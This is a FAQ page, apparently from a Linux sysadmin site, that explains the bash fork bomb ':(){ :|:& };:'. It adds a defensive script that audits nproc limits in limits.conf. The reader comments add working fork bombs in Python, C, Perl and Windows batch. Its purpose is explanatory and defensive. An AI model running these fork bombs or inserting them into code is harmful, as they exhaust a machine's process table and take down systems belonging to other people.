Understanding Bash fork() bomb ~ :(){ :|:& };:
Q. Can you explain the following bash code or bash fork() bomb?
:(){ :|:& };:
A. This is a bash function. It gets called recursively (a recursive function). This is the most horrible code for any Unix / Linux box. It is often used by sysadmins to test user process limits (Linux process limits can be configured via /etc/security/limits.conf and PAM).
Once a successful fork bomb has been activated in a system it may not be possible to resume normal operation without rebooting, as the only solution to a fork bomb is to destroy all instances of it.
WARNING! These examples may crash your computer if executed.
Understanding :(){ :|:& };: fork() bomb code
:() - Defines a function named ':'. It accepts no arguments at all. Generally, a bash function is defined as follows:
foo(){
    arg1=$1
    echo ''
    # do_something on $arg1 argument
}
fork() bomb is defined as follows:
:(){ :|:& };:
:|: - Next, the function calls itself using a programming technique called recursion and pipes the output to another call of the function ':'. The worst part is that the function gets called two times to bomb your system.
& - Puts the function call in the background so the child cannot die at all and starts eating system resources.
; - Terminates the function definition.
: - Calls (runs) the function, aka sets off the fork() bomb.
Here is more human-readable code:
bomb() {
bomb | bomb &
}; bomb
A properly configured Linux / UNIX box should not go down when a fork() bomb is set off.
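As an added example (not part of the original FAQ), the following POSIX shell script checks limits.conf-format text for a bounded hard nproc limit, the setting that keeps a runaway recursive function from exhausting the process table. The function names and the sample entries are constructed for illustration; group membership and limits.d drop-ins are not resolved, and the last matching line is assumed to win.

```sh
#!/bin/sh
# Added example (not from the original FAQ): audit hard nproc limits in
# limits.conf-format text. Assumptions: group membership is not resolved,
# limits.d drop-ins are not read, and the last matching line wins.

# Print the hard nproc value for a domain (user, @group or *), falling
# back to the "*" wildcard; print "none" if no bounded value is set.
hard_nproc_for() {   # $1 = limits file, $2 = domain
    awk -v want="$2" '
        { sub(/#.*/, "") }                  # drop comments
        NF < 4 || $3 != "nproc" { next }    # only complete nproc entries
        $2 != "hard" && $2 != "-" { next }  # "-" sets both soft and hard
        $1 == want { exact = $4 }
        $1 == "*"  { wild = $4 }
        END {
            v = (exact != "") ? exact : wild
            if (v == "" || v == "unlimited" || v == "infinity" || v == "-1")
                v = "none"
            print v
        }' "$1"
}

# Return 0 when the domain has a bounded hard limit no larger than $3.
# A soft-only entry does not count: a user can raise it up to the hard limit.
nproc_ok() {         # $1 = limits file, $2 = domain, $3 = max acceptable
    limit=$(hard_nproc_for "$1" "$2")
    [ "$limit" != "none" ] && [ "$limit" -le "$3" ]
}

# Constructed sample input, not taken from any real system.
SAMPLE=$(mktemp)
trap 'rm -f "$SAMPLE"' EXIT
cat > "$SAMPLE" <<'EOF'
# <domain>  <type>  <item>  <value>
*           soft    nproc   1024
@students   hard    nproc   50      # lab accounts
dbadmin     -       nproc   unlimited
backup      hard    nofile  4096
EOF

for d in @students dbadmin backup; do
    if nproc_ok "$SAMPLE" "$d" 500; then
        echo "$d: bounded at $(hard_nproc_for "$SAMPLE" "$d")"
    else
        echo "$d: no bounded hard nproc limit <= 500"
    fi
done
```

In the sample, only @students is bounded; the wildcard line sets a soft limit only, so backup inherits no hard cap.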
Related: How to: Prevent a fork bomb by limiting user process under Linux.
Update: Check out comment # 5 for more fork bomb examples under Perl, Windows XP and C.
Discussion on This FAQ
November 26th, 2007 at 9:53 am
I tested this on a fresh install of CentOS and it totally crashed.
How about a nice “howto” for protecting against these attacks?
November 27th, 2007 at 12:01 am
I second the vote for a nice howto.
Cheers
November 27th, 2007 at 5:02 pm
Thirded!
How to prevent a “fork bomb”.
November 28th, 2007 at 1:19 am
Yes How to must be started, for the benefits of the innocent users, as the viruses are spread by entities whose brains are configured differently.
November 28th, 2007 at 9:09 am
Perl example:
Python example:
import os
while(1):
    os.fork()
Windows XP / Vista bat file example:
UNIX style for Windows:
C program example:
#include
int main() { while(1) fork(); }
Please note that the fork bomb is a form of denial of service, so don’t run on a production or unauthorized system.
November 28th, 2007 at 11:42 am
Another one is that when you have set a quota for your mailboxes and crontab is generating mail over and over, eventually the quota will be exceeded; after a while the mailq will fill up with 1000’s of mail and the system will crash.
November 28th, 2007 at 11:52 am
Hi,
I ran it on my testing server and it started consuming my server process.
So one thing is clear from this fork bomb: it starts issuing new processes rather than threads.
How do we prevent our sites from such fork attacks?
Thanks in advance
November 28th, 2007 at 12:56 pm
kunal,
Read http://www.cyberciti.biz/tips/linux-limiting-user-process.html
November 28th, 2007 at 2:27 pm
I tried this on a virtual instance of SLAX, and it totally killed it.
December 5th, 2007 at 4:21 pm
perl inline…
perl -e “fork while fork” &
January 30th, 2008 at 4:15 am
Sleek code
I tried on FC4. Took only 1 minute as root.
In WinXP, I waited till 7 minutes. Displayed some errors and all, but was responding. Tried MS Word, Task Manager, nothing could be executed. The machine was useless until reset.
March 31st, 2008 at 6:06 pm
This works very quickly on all windows:
:bomb
%0 | %0
goto bomb